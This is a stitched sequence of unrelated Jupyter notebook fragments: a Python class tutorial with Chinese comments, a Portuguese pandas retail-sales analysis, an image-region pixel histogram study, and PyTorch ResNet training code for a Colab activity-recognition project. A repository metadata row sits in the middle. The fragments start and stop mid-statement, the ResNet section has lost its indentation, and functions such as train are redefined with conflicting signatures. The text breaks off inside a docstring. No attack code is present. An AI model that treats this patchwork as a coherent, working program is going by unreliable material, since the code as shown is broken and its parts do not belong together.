        """Height of an equilateral triangle: (sqrt(3)/2) * edge."""
        return (3 ** (1 / 2)) / 2 * self.edge


class square(polygon):
    """Square built from a perimeter of `length` (edge = length/4)."""

    def __init__(self, length):
        super().__init__(length)
        self.edge = self.length / 4

    def __repr__(self):
        # Fix: same missing `return` as triangle.__repr__.
        return f'Square of diagonal {self.diagonal()}' + f"\nArea : {self.area()}"

    def area(self):
        return self.edge ** 2

    def diagonal(self):
        """Diagonal of a square: sqrt(2) * edge."""
        return (2 ** (1 / 2)) * self.edge
# +
# 可以使用此程式驗證你的 class 有沒有撰寫正確
tri5 = triangle(10)
print(tri5.area())
print(tri5.height())
sqr7 = square(7)
print(sqr7.area())
print(sqr7.diagonal())
# -
# ## <b>補充1
# > <b>class attribute<br>
# > <b>instance attribute
class Animal:
    # Demo: `cat` lives on the class object (shared by all instances), while
    # `dog` and `cow` are created on each instance inside __init__.
    cat = 0 # class attribute
    def __init__(self):
        self.dog = 5 # instance attribute
        self.cow = "Python" # instance attribute
Animal.__dict__ # vars(Animal)
Animal.cat
my_cls = Animal()
my_cls.__dict__
my_cls.dog
my_cls.cow
# 還是可以呼叫到class attribute
my_cls.cat
# ## <b>補充2
# > <b>private<br>
class Animal:
    cat = 0
    def __init__(self):
        # Two leading underscores trigger name mangling: from outside the
        # class the attribute is only reachable as _Animal__dog, so it
        # behaves as "private".
        self.__dog = 5 # two leading underscores make the attribute private
        self.cow = "Python"
my_cls = Animal()
my_cls.dog
my_cls.__dog
vars(my_cls)
my_cls._Animal__dog
# ## <b>補充3
# > <b>__init__<br>
class company:
    # Demo of the shared-mutable-class-attribute pitfall: `employee` is a
    # class-level list that __init__ mutates in place (+= on a list), so every
    # instance appends to the SAME list. `self.name += name` and
    # `self.age += age` instead rebind new per-instance values (str/int are
    # immutable), leaving the class attributes `name`/`age` unchanged.
    employee = []
    name = ""
    age = 0
    def __init__(self, name, age): # employee is never re-initialized per instance
        self.employee += [name]
        self.name += name
        self.age += age
print(company.employee)
print(company.name)
print(company.age)
A = company(name = "John", age = 18)
print(company.employee) # 因為 employee 沒有初始化
print(company.name)
print(company.age)
B = company(name = "JoJo", age = 15)
C = company(name = "DIO", age = 180)
print(company.employee) # 因為 employee 沒有初始化
print(company.name)
print(company.age)
| 17,206 |
/4. XGBoost.ipynb
|
5c95fbcf4abcefd82edd0d1b6990a84df5e0ad10
|
[] |
no_license
|
garyjxgong/Mortgage-Default-Detection
|
https://github.com/garyjxgong/Mortgage-Default-Detection
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 127,007 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ### Disciplina: Projeto Data Warehouse
#
# ### PROFª: Juliana Forin Pasquini Martinez
#
# #### ALUNOS: Henrique Zucareli Santiago, Marcelo Pereira Fernandes
#
# #### OBJETIVO: Analisar vendas de uma rede de lojas
#
# Baixar dados de: https://drive.google.com/file/d/1snkXBakN3Yo_imKamUCtdz2ZYpIXF3KD/view?usp=sharing
# ### Importando panda
#importando panda
import pandas as pd
# ### Importanto Base de dados do arquivo csv
# importando base de dados do arquivo csv
data = pd.read_csv('Vendas.csv', encoding = 'Latin 1', sep = ';')
# ### Especificando o Cabeçalho do Arquivo
#Especificando o cabeçalho do arquivo
data = pd.read_csv('Vendas.csv', encoding = 'Latin 1', sep = ';', header = 0)
# ### Selecionando Colunas
data = pd.read_csv('Vendas.csv', encoding = 'Latin 1', sep = ';', usecols = ['COD_VENDA','DATA', 'ID_LOJA', 'PRODUTO', 'QUANTIDADE','VR_UNIT', 'VR_FINAL'])
# ### Visualização da tabela de Dados
data.head()
# ### Importando biblioteca seaborn
import seaborn as sb
low_memory=False
# %matplotlib inline
pd.options.display.max_columns = 80
pd.options.display.max_rows = 90
# ### Soma de vendas de todas as lojas
# Grand total of sales over every row, rounded to 2 decimals.
venda_total = round(data.VR_FINAL.sum(),2)
display(venda_total)
# ### Soma de vendas de cada loja
# Revenue per store, sorted by store id (descending).
venda_loja = data[['ID_LOJA', 'VR_FINAL']].groupby('ID_LOJA').sum()
venda_loja = venda_loja.sort_values(by='ID_LOJA', ascending=False)
display(venda_loja)
# ### Soma da quantidade de vendas de cada loja
# Units sold per store, sorted by store id (descending).
quantidade_loja = data[['ID_LOJA', 'QUANTIDADE']].groupby('ID_LOJA').sum()
quantidade_loja = quantidade_loja.sort_values(by='ID_LOJA', ascending=False)
display(quantidade_loja)
# ### Média de valor de cada venda em cada loja
# Average ticket per store = revenue / units (indexes align on ID_LOJA).
venda_media = (venda_loja['VR_FINAL'] / quantidade_loja['QUANTIDADE']).to_frame()
venda_media = venda_media.rename(columns={0: 'VENDA_MEDIA'})
venda_media = venda_media.sort_values(by='VENDA_MEDIA', ascending=False)
display(venda_media)
# ### Gráfico de barra com o comparativo de vendas de cada loja
venda_loja.groupby('ID_LOJA')['VR_FINAL'].sum().sort_values().tail(13).plot(title='VENDA POR LOJA', kind='bar', figsize=(10,5))
# ### Gráfico de pizza com o comparativo de vendas de cada loja
venda_loja.groupby('ID_LOJA')['VR_FINAL'].sum().sort_values().tail(13).plot(title='VENDA POR LOJA', kind='pie', figsize=(10,5))
# ### Dados da quantidade de cada produto vendido
# Units sold per product, best sellers first.
produto_vendido = data[['PRODUTO', 'QUANTIDADE']].groupby('PRODUTO').sum()
produto_vendido = produto_vendido.sort_values(by='QUANTIDADE', ascending=False)
display(produto_vendido)
# ### Soma do valor de vendas de cada produto
# Revenue per product, highest first.
produto_faturamento = data[['PRODUTO', 'VR_FINAL']].groupby('PRODUTO').sum()
produto_faturamento = produto_faturamento.sort_values(by='VR_FINAL', ascending=False)
display(produto_faturamento)
n('Região Branca', pixel_intensity=255, threshold=255, original=original, segmented=segmented)
axarr[1, 1].set_title(t)
axarr[1, 1].imshow(img, cmap='gray')
# -
# Agora que temos as regiões fragmentadas, vamos explorar um pouco mais a intesidade dos pixels de cada região, avaliando o histograma de cada região e se pertence a alguma distribuição conhecida.
# A função "group_region_pixels" irá agrupar os pixels da imagem original, retornando as intensidades dos pixels. Agora não iremos mais trabalhar diretamente com o posicionamento dos pixels, apenas com as intensidades de pixels que pertencem a cada região.
#
# Portanto essa função retorna um dicionário, onde os índices do dicionário serão:
# 0, 50, 200, 255, sendo região escura, preto-claro, cinza e branca, respectivamente.
groups = group_region_pixels(original, segmented)
print('As chaves do dicionário "groups" são:')
groups.keys()
# # 2 - Análise das Regiões
#
# Na análise das regiões, vamos compreender quais são a intensidade dos pixels de cada região e ao analisarmos o histograma visualmente, verificar se o mesmo pode-se adequar a uma distribuição já conhecida.
#
# ## 2.1 - Região Escura
#
# Para acessarmos a região escura, precisamos acessar groups[0].
"""
Descreve os pixels da região, dizendo a quantidade total, maior e menor intensidade.
Retorna a versão em numpy array da lista.
"""
def desc(region_name, list_group):
    """Describe a region's pixels (count, min and max intensity) and return
    the list converted to a numpy array."""
    region = np.asarray(list_group)
    count = len(list_group)
    lo, hi = region.min(), region.max()
    print(f'Há {count} pixels na região {region_name}.')
    print(f'A menor intensidade de pixel é {lo} e a máxima é {hi}.')
    return region
np_dark_region = desc('escura', groups[0])
sns.distplot(np_dark_region, bins = range(0,256), norm_hist=True)
# ### Conclusão
#
#
# Vemos que a região **escura** possui a grande maioria dos pixels com intensidade 0 (totalmente preto) e alguns pixels outliers diferente de 0.
#
# Dessa forma, torna-se difícil dizer que a **região escura** segue alguma distribuição.
# ## 2.2 - Região Preto-claro
#
# Para acessarmos a região preto-claros, acessamos groups[50].
np_light_dark_region = desc('escura', groups[50])
sns.distplot(np_light_dark_region, bins = range(0,256), norm_hist=True)
# Nesta região, o comportamento já é um pouco diferente. Se parece com a distribuição **exponencial**.
import scipy.stats as st
sns.distplot(np_light_dark_region, bins = range(0,256), fit=st.expon, norm_hist=True)
# #### Conclusão:
#
# Podemos realizar o teste do qui-quadrado para avaliar a adequação da região preto-claro em relação à distribuição exponencial.
# ## 2.3 - Região Cinza
#
# Para acessarmos a região cinza, usamos groups[200].
np_grey_region = desc('cinza', groups[200])
sns.distplot(np_grey_region, bins = range(0,256), norm_hist=True)
# #### Conclusão:
#
# Não é possível inferir nada referente à região cinza.
# ## 2.4 - Região Branca
#
# Para acessarmos a região branca, usamos groups[255].
np_white_region = desc('branca', groups[255])
sns.distplot(np_white_region, bins = range(0,256), norm_hist=True)
# Será que se parece com a normal?
sns.distplot(np_white_region, bins = range(0,256), norm_hist=True, fit=st.norm)
# #### Conclusão:
#
# Não é possível inferir nada sobre a região branca.
# # 3 - Conclusão Preliminar
#
# Não foi possível avaliar a primeiro momento a adequação de nenhuma das regiões às distribuições conhecidas, como gaussiano, exponencial, gamma ou rayleigh, com ressalvo à região cinza, que pode estar relacionada à dsitribuição exponencial.
= None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
    """Standard ResNet forward pass; returns class logits from fc_custom."""
    x = self.conv1_custom(x)  # stem conv with a custom input-channel count
    x = self.bn1(x)
    x = self.relu(x)
    x = self.maxpool(x)
    x = self.layer1(x)
    x = self.layer2(x)
    x = self.layer3(x)
    x = self.layer4(x)
    x = self.avgpool(x)
    x = x.view(x.size(0), -1)  # flatten to (batch, features)
    out = self.fc_custom(x)
    return out
def resnet18(pretrained=False, channel= 20, **kwargs):
    """Constructs a ResNet-18 model.
    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        channel (int): number of conv1 input channels; pretrained RGB conv1
            weights are adapted via weight_transform when channel != 3
    """
    model = ResNet(BasicBlock, [2, 2, 2, 2], nb_classes=101, channel=channel, **kwargs)
    if pretrained:
        pretrain_dict = model_zoo.load_url(model_urls['resnet18']) # modify pretrain code
        model_dict = model.state_dict()
        model_dict=weight_transform(model_dict, pretrain_dict, channel)
        model.load_state_dict(model_dict)
    return model


def resnet34(pretrained=False, channel= 20, **kwargs):
    """Constructs a ResNet-34 model (same argument contract as resnet18)."""
    model = ResNet(BasicBlock, [3, 4, 6, 3], nb_classes=101, channel=channel, **kwargs)
    if pretrained:
        pretrain_dict = model_zoo.load_url(model_urls['resnet34']) # modify pretrain code
        model_dict = model.state_dict()
        model_dict=weight_transform(model_dict, pretrain_dict, channel)
        model.load_state_dict(model_dict)
    return model


def resnet50(pretrained=False, channel= 20, **kwargs):
    """Constructs a ResNet-50 model (Bottleneck blocks; same contract as resnet18)."""
    model = ResNet(Bottleneck, [3, 4, 6, 3], nb_classes=101, channel=channel, **kwargs)
    if pretrained:
        pretrain_dict = model_zoo.load_url(model_urls['resnet50']) # modify pretrain code
        model_dict = model.state_dict()
        model_dict=weight_transform(model_dict, pretrain_dict, channel)
        model.load_state_dict(model_dict)
    return model


def resnet101(pretrained=False, channel= 20, **kwargs):
    """Constructs a ResNet-101 model (Bottleneck blocks; same contract as resnet18)."""
    model = ResNet(Bottleneck, [3, 4, 23, 3],nb_classes=101, channel=channel, **kwargs)
    if pretrained:
        pretrain_dict = model_zoo.load_url(model_urls['resnet101']) # modify pretrain code
        model_dict = model.state_dict()
        model_dict=weight_transform(model_dict, pretrain_dict, channel)
        model.load_state_dict(model_dict)
    return model


def resnet152(pretrained=False, **kwargs):
    """Constructs a ResNet-152 model.

    NOTE(review): unlike the other constructors this one takes no
    channel/nb_classes arguments and loads the 3-channel checkpoint directly
    via load_state_dict — confirm it is intended to stay RGB-only.
    """
    model = ResNet(Bottleneck, [3, 8, 36, 3], **kwargs)
    if pretrained:
        model.load_state_dict(model_zoo.load_url(model_urls['resnet152']))
    return model
def cross_modality_pretrain(conv1_weight, channel):
    """Adapt a pretrained 3-channel conv1 weight to `channel` input channels
    by averaging the RGB filters and replicating the mean per channel."""
    rgb_mean = (conv1_weight[:, 0, :, :]
                + conv1_weight[:, 1, :, :]
                + conv1_weight[:, 2, :, :]) / 3.
    adapted = torch.FloatTensor(64, channel, 7, 7)
    for c in range(channel):
        adapted[:, c, :, :] = rgb_mean.data
    return adapted
def weight_transform(model_dict, pretrain_dict, channel):
    """Copy pretrained weights whose keys exist in model_dict, adapting the
    conv1 weight to `channel` input channels (stored as conv1_custom.weight).

    Mutates and returns model_dict.
    """
    matched = {k: v for k, v in pretrain_dict.items() if k in model_dict}
    rgb_conv1 = pretrain_dict['conv1.weight']
    if channel == 3:
        adapted_conv1 = rgb_conv1
    else:
        adapted_conv1 = cross_modality_pretrain(rgb_conv1, channel)
    matched['conv1_custom.weight'] = adapted_conv1
    model_dict.update(matched)
    return model_dict
#Test network
if __name__ == '__main__':
model = resnet34(pretrained= True, channel=20)
print(model)
# + id="ywsBlEhUshQN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 128} outputId="685d90bc-9615-477c-ec6d-6140084286af"
# !pip install tqdm
# + id="QeqHOMLlhdi-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="dd1f3218-8737-4928-9d1d-5cd7a6e752de"
import numpy as np
import pickle
from PIL import Image
import time
import tqdm
import shutil
from random import randint
import keras
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
import torchvision.models as models
import torch.nn as nn
import torch
import torch.backends.cudnn as cudnn
from torch.autograd import Variable
from torch.optim.lr_scheduler import ReduceLROnPlateau
# + id="0PEiEeO5hdlX" colab_type="code" colab={}
epochs = 500
batch_size = 64
lr = 1e-2
resume = ' '
start_epoch = 0
# + id="MQaP7KcFk9-0" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a0adea3b-191f-4294-dfe6-581bca851c61"
# %cd HAR
# + id="yT-XQa_uu4wl" colab_type="code" colab={}
import pandas as pd
labels = pd.read_csv('train.csv',index_col = 0)
#sample_submission = pd.read_csv(path + 'sample_submission.csv')
# + id="ztlySm5bu4sj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 204} outputId="ec2251bd-e3c2-4803-c257-b668052c88fe"
selected_labels = labels
selected_labels[:5]
# + id="i6AYea87IET8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="2093e368-8e1f-47f7-8abc-40f1c027c082"
selected_labels['label'] = selected_labels['label'].astype(int)
selected_labels['label'].dtype
# + id="W_Q1-mwiu4l-" colab_type="code" colab={}
from sklearn.model_selection import train_test_split
train_labels, valid_labels = train_test_split(selected_labels, test_size=0.3,shuffle=True)
# + id="RbG0Fpykx-mB" colab_type="code" colab={}
import math
import numpy as np
import pandas as pd
from IPython.display import FileLink
import matplotlib.pyplot as plt
from PIL import Image
import torch
import torch.nn.functional as F
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
from torch.optim import lr_scheduler
import torch.utils.data
import torch.utils.data.distributed
from torch.utils.data import Dataset, DataLoader
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from torchvision.utils import make_grid
from torch.utils.data import Dataset, DataLoader
# %matplotlib inline
# + id="zDdhdE1W-KRi" colab_type="code" colab={}
batch_size = 64
epochs = 500
num_classes = 7
# + id="yQLoGBZrwixa" colab_type="code" colab={}
transform = transforms.Compose([
transforms.ToTensor(),
])
# + id="kAiT4uayu4h7" colab_type="code" colab={}
class activityDataset(Dataset):
    """Dataset backed by per-sample array files under root_dir.

    `labels` is indexable via .iloc and each row exposes 'id' (file name
    relative to root_dir) and 'label' (the class target).
    """
    def __init__(self, root_dir, labels, transform):
        self.labels = labels
        self.root_dir = root_dir
        self.transform = transform

    def __len__(self):
        # One sample per labels row.
        return len(self.labels)

    def __getitem__(self, idx):
        item = self.labels.iloc[idx]
        #print(item)
        path = self.root_dir + '/' + item['id']
        #print(item['id'])
        # assumes item['id'] names a numpy-loadable (.npy) file — TODO confirm
        image = np.load(path)
        #print(image)
        if self.transform:
            image = self.transform(image)
        #print(image,item['class'])
        return image, item['label']
# + id="mRcDh5JdI9pn" colab_type="code" colab={}
t1 = activityDataset('data', train_labels, transform)
#t1[11]
# + id="MlRDjMaUu4Un" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 2397} outputId="49fa2df2-bc34-43ef-bcda-0a83cd681710"
criterion = nn.CrossEntropyLoss().cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=lr)
modelres = model
modelres
# + id="1L470BLvC0fS" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 207} outputId="522fe1f3-f208-4e54-ad50-8f6ac17be158"
# !pip install tensorboard_logger
# + id="CGQtjD9UIgOM" colab_type="code" colab={}
def train(model, train, valid, optimizer, criterion, epochs=1, scheduler=None):
    """Train `model` for `epochs` epochs, validating after each one.

    Prints running train/validation loss and accuracy; accuracy is computed
    against len(loader.dataset.labels).

    NOTE(review): written against a pre-0.4 PyTorch API (`loss.data[0]`,
    `volatile=True`); on modern torch these raise — confirm the target
    torch version before reuse.
    """
    for epoch in range(epochs):
        print('Epoch ', epoch + 1, '/', epochs)
        running_loss = 0.
        running_corrects = 0.
        running_batches = 0.
        if scheduler:
            scheduler.step()

        model = model.cuda()
        model.train()
        # ---- training pass ----
        for i, (input, target) in enumerate(train):
            input = input.cuda()
            target = target.cuda()
            input_var = torch.autograd.Variable(input)
            target_var = torch.autograd.Variable(target)#.type(torch.LongTensor).cuda()
            optimizer.zero_grad()
            # compute output
            output = model(input_var)
            #print('output : ',output)
            #print('target:',target_var)
            _, preds = torch.max(output.data, 1)
            loss = criterion(output, target_var)
            loss.backward()
            optimizer.step()

            running_loss += loss.data[0]
            running_corrects += torch.sum(preds == target)
            running_batches += 1.
            print('\r', 'Batch', i, 'Loss', loss.data[0], end='')

        train_loss = running_loss / running_batches
        train_acc = running_corrects / len(train.dataset.labels)
        print('\r', "Train Loss", train_loss, "Train Accuracy", train_acc)

        # ---- validation pass (no gradient updates) ----
        running_loss = 0.
        running_corrects = 0.
        running_batches = 0.
        model.eval()
        for i, (input, target) in enumerate(valid):
            input = input.cuda()
            target = target.cuda()
            input_var = torch.autograd.Variable(input, volatile=True)
            target_var = torch.autograd.Variable(target, volatile=True)
            output = model(input_var)
            _, preds = torch.max(output.data, 1)
            loss = criterion(output, target_var)
            running_loss += loss.data[0]
            running_corrects += torch.sum(preds == target)
            running_batches += 1.
        valid_loss = running_loss / running_batches
        valid_acc = running_corrects / len(valid.dataset.labels)
        #print()
        print('\r', "Val Loss", valid_loss, "Val Accuracy", valid_acc)
# + id="Ai7BZmB6Jq3m" colab_type="code" colab={}
train_dataset = activityDataset('data', train_labels, transform)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=batch_size//2,
shuffle=True
)
val_loader = torch.utils.data.DataLoader(
activityDataset('data', valid_labels, transform),
batch_size=batch_size//2,
shuffle=True
)
# + id="72yxu_mTIgJF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 894} outputId="0e2fe77a-482b-4b0d-b06c-a2b6ae9af9ba"
model_train = train(modelres, train_loader, val_loader, optimizer, criterion, epochs=100) #, scheduler=scheduler)
# + id="nshRjU_pIf-t" colab_type="code" colab={}
LOG_DIR = 'runs/temporal_cnn/'
get_ipython().system_raw(
'tensorboard --logdir {} --host 0.0.0.0 --port 6006 &'
.format(LOG_DIR)
)
# + id="hHOy_0WN2_6C" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 126} outputId="d18e0d56-95ed-4fb2-ed88-17582ad86c42"
# !git clone https://github.com/mixuala/colab_utils.git
# + id="3t6GLwALIf5H" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 90} outputId="ac79f10b-26a9-4043-d89b-1b5c2861546c"
# ! npm install -g localtunnel
# + id="EEOjfIs41ZVo" colab_type="code" colab={}
get_ipython().system_raw('lt --port 6006 >> url.txt 2>&1 &')
# + id="pkFSguSJ1ZOw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="a6b45c7b-ff69-49b2-8502-508bf9a42bb4"
# ! cat url.txt
# + id="JhoKaqid1ZIc" colab_type="code" colab={}
# + id="tpMF7GB31Y_u" colab_type="code" colab={}
# + id="o0Z2gLnSEknU" colab_type="code" colab={}
epochs=300
start_epoch=0
batch_size=64
lr=0.1
momentum=0.9
weight_decay=1e-4
print_freq=10
layers=100
growth=12
droprate = 0.0
reduce=0.5
resume=''
best_prec1 = 0
# + id="TQAZ5JIXGBW1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 1625} outputId="7217587f-c603-40c6-bea6-f313452a27db"
import os
from tensorboard_logger import configure, log_value
tensorboard = True
def main():
    """Training driver: build the model, optionally resume from a checkpoint,
    then train/validate for `epochs` epochs, checkpointing the best top-1."""
    epochs=300
    start_epoch=0
    batch_size=64
    lr=0.1
    momentum=0.9
    weight_decay=1e-4
    print_freq=10
    layers=100
    growth=12
    droprate = 0.0
    reduce=0.5
    resume=''
    prec1 = 0
    best_prec1 = 0
    #tensorboard = True
    name = 'temporal_cnn'
    global tensorboard
    #global best_prec1,start_epoch
    #configure("runs/%s"%(name))
    # create model (reuses the notebook-level `modelres`)
    model = modelres

    # for training on multiple GPUs.
    # Use CUDA_VISIBLE_DEVICES=0,1 to specify which GPUs to use
    # model = torch.nn.DataParallel(model).cuda()
    model = model.cuda()

    # optionally resume from a checkpoint
    if resume:
        if os.path.isfile(resume):
            print("=> loading checkpoint '{}'".format(resume))
            checkpoint = torch.load(resume)
            start_epoch = checkpoint['epoch']
            best_prec1 = checkpoint['best_prec1']
            model.load_state_dict(checkpoint['state_dict'])
            print("=> loaded checkpoint '{}' (epoch {})"
                  .format(resume, checkpoint['epoch']))
        else:
            print("=> no checkpoint found at '{}'".format(resume))

    cudnn.benchmark = True  # let cuDNN pick the fastest conv algorithms

    # define loss function (criterion) and optimizer
    criterion = nn.CrossEntropyLoss().cuda()
    optimizer = torch.optim.SGD(model.parameters(), lr,
                                momentum=momentum,
                                nesterov=True,
                                weight_decay=weight_decay)

    for epoch in range(start_epoch, epochs):
        adjust_learning_rate(optimizer, epoch)
        prec1 = 0
        # train for one epoch
        train(train_loader, model, criterion, optimizer, epoch)

        # evaluate on validation set
        prec1 = validate(val_loader, model, criterion, epoch)

        # remember best prec@1 and save checkpoint
        #print("prec1:",prec1)
        #print("best_prec1:",best_prec1)
        is_best = prec1 > best_prec1
        best_prec1 = max(prec1, best_prec1)
        save_checkpoint({
            'epoch': epoch + 1,
            'state_dict': model.state_dict(),
            'best_prec1': best_prec1,
        }, is_best)
    #print('Best accuracy: ', best_prec1)
def train(train_loader, model, criterion, optimizer, epoch):
    """Train for one epoch on the training set, logging loss/top-1 averages."""
    batch_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()

    # switch to train mode
    model.train()

    end = time.time()
    for i, (input, target) in enumerate(train_loader):
        # Fix: `async=True` is a SyntaxError on Python 3.7+ (`async` became a
        # reserved keyword); `non_blocking=True` is the torch>=0.4 spelling.
        target = target.cuda(non_blocking=True)
        input = input.cuda()
        input_var = torch.autograd.Variable(input)
        target_var = torch.autograd.Variable(target)

        # compute output
        output = model(input_var)
        loss = criterion(output, target_var)

        # measure accuracy and record loss
        # NOTE(review): `loss.data[0]` is the pre-0.5 idiom (`loss.item()` on
        # modern torch); kept to match the rest of this notebook.
        prec1 = accuracy(output.data, target, topk=(1,))[0]
        losses.update(loss.data[0], input.size(0))
        top1.update(prec1[0], input.size(0))

        # compute gradient and do SGD step
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()

        # measure elapsed time
        batch_time.update(time.time() - end)
        end = time.time()

        if i % print_freq == 0:
            print('Epoch: [{0}][{1}/{2}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                  'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
                      epoch, i, len(train_loader), batch_time=batch_time,
                      loss=losses, top1=top1))
    # log to TensorBoard
    if tensorboard:
        log_value('train_loss', losses.avg, epoch)
        log_value('train_acc', top1.avg, epoch)
def validate(val_loader, model, criterion, epoch):
    """Evaluate on the validation set; returns the average top-1 precision."""
    batch_time = AverageMeter()
    losses = AverageMeter()
    top1 = AverageMeter()

    # switch to evaluate mode
    model.eval()

    end = time.time()
    for i, (input, target) in enumerate(val_loader):
        # Fix: `async=True` is a SyntaxError on Python 3.7+ (`async` became a
        # reserved keyword); `non_blocking=True` is the torch>=0.4 spelling.
        target = target.cuda(non_blocking=True)
        input = input.cuda()
        # NOTE(review): `volatile=True` is the pre-0.4 no-grad mechanism
        # (modern form: `with torch.no_grad():`); kept to match this notebook.
        input_var = torch.autograd.Variable(input, volatile=True)
        target_var = torch.autograd.Variable(target, volatile=True)

        # compute output
        output = model(input_var)
        loss = criterion(output, target_var)

        # measure accuracy and record loss
        prec1 = accuracy(output.data, target, topk=(1,))[0]
        losses.update(loss.data[0], input.size(0))
        top1.update(prec1[0], input.size(0))

        # measure elapsed time
        batch_time.update(time.time() - end)
        end = time.time()

        if i % print_freq == 0:
            print('Test: [{0}/{1}]\t'
                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
                  'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
                      i, len(val_loader), batch_time=batch_time, loss=losses,
                      top1=top1))

    print(' * Prec@1 {top1.avg:.3f}'.format(top1=top1))
    # log to TensorBoard
    if tensorboard:
        log_value('val_loss', losses.avg, epoch)
        log_value('val_acc', top1.avg, epoch)
    return top1.avg
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
    """Save ``state`` under ``runs/checkpoint/`` and mirror the best model.

    Parameters
    ----------
    state : dict
        Anything ``torch.save`` can serialize (state dicts, epoch, ...).
    is_best : bool
        When True the checkpoint is also copied to ``model_best.pth.tar``.
    filename : str
        Basename of the checkpoint file inside the run directory.
    """
    # ``"runs/%s/" % 'checkpoint'`` was a no-op format -- build the path
    # explicitly with os.path.join instead of string concatenation.
    directory = os.path.join('runs', 'checkpoint')
    os.makedirs(directory, exist_ok=True)  # race-free vs. exists()+makedirs()
    path = os.path.join(directory, filename)
    torch.save(state, path)
    if is_best:
        shutil.copyfile(path, os.path.join(directory, 'model_best.pth.tar'))
class AverageMeter(object):
    """Keep the most recent value plus a running mean of everything seen."""

    def __init__(self):
        self.reset()

    def reset(self):
        """Zero out the current value, running sum, count and mean."""
        self.val, self.avg = 0, 0
        self.sum, self.count = 0, 0

    def update(self, val, n=1):
        """Fold in ``val`` observed ``n`` times and refresh the mean."""
        self.val = val
        self.sum += n * val
        self.count += n
        self.avg = self.sum / self.count
def adjust_learning_rate(optimizer, epoch):
    """Set the LR to the initial 0.1, decayed by 10x after epochs 150 and 225.

    The docstring previously sat *after* the first statement, so the
    function had no ``__doc__``; it is now in the canonical position and
    the decay is computed in a single expression.
    """
    lr = 0.1 * (0.1 ** (epoch // 150)) * (0.1 ** (epoch // 225))
    # log to TensorBoard (``tensorboard`` is a module-level flag)
    if tensorboard:
        log_value('learning_rate', lr, epoch)
    for param_group in optimizer.param_groups:
        param_group['lr'] = lr
def accuracy(output, target, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
# Script entry point: only run training when executed directly, not on import.
if __name__ == '__main__':
    main()
# + id="qXCqs2UeGCGN" colab_type="code" colab={}
# + id="xfghLNnuGB60" colab_type="code" colab={}
# + id="uKKLeyMSGB2A" colab_type="code" colab={}
# + id="UnvghaW8GBw4" colab_type="code" colab={}
# + id="I2sS4zRFGBPY" colab_type="code" colab={}
# + id="0p7UJT30GBIJ" colab_type="code" colab={}
# + id="9C2MKgmwGBBF" colab_type="code" colab={}
# + id="b-Cal60OGA6e" colab_type="code" colab={}
# + id="um9hk1i5GA1E" colab_type="code" colab={}
# + id="T3KRJrYoGAwR" colab_type="code" colab={}
# + id="lswKAOh-GArk" colab_type="code" colab={}
# + id="3k0zayP9GAnJ" colab_type="code" colab={}
# + id="cVcVpzgjGAiP" colab_type="code" colab={}
# + id="JYWgL2cVGAbl" colab_type="code" colab={}
# + id="2FAE5eLRGAWJ" colab_type="code" colab={}
# + id="5raDkZtoGARB" colab_type="code" colab={}
# + id="h2bwYVcD-Xko" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 17} outputId="68a0f0fb-76b1-4985-8bca-6234292dea33"
import os
import shutil
import time
import torch
from tensorboard_logger import log_value
#model, train, valid, optimizer, criterion, epochs=1, scheduler=None
def train(train_dataset, train_loader, model, criterion, optimizer, val_loader, checkpoint_directory, scheduler=None):
    """Train over ``train_loader``, validating/checkpointing every ``save_steps_freq`` steps.

    Fixes over the previous revision:
    * uses the ``criterion``/``optimizer`` passed by the caller -- the old
      code clobbered them via an undefined ``self`` and ``lr`` (NameError);
    * ``samples``, ``best_prec1`` and ``best_train_prec1`` are initialised
      (previously UnboundLocalError on first use);
    * the loop now actually calls ``backward()``/``step()`` -- without them
      no learning happened at all;
    * ``async=True`` (a Python >= 3.7 SyntaxError) -> ``non_blocking=True``,
      ``loss.data[0]`` -> ``loss.item()``.

    Still relies on module-level globals ``args`` (``print_freq``,
    ``accum``), ``save_steps_freq``, ``get_learning_rate`` and
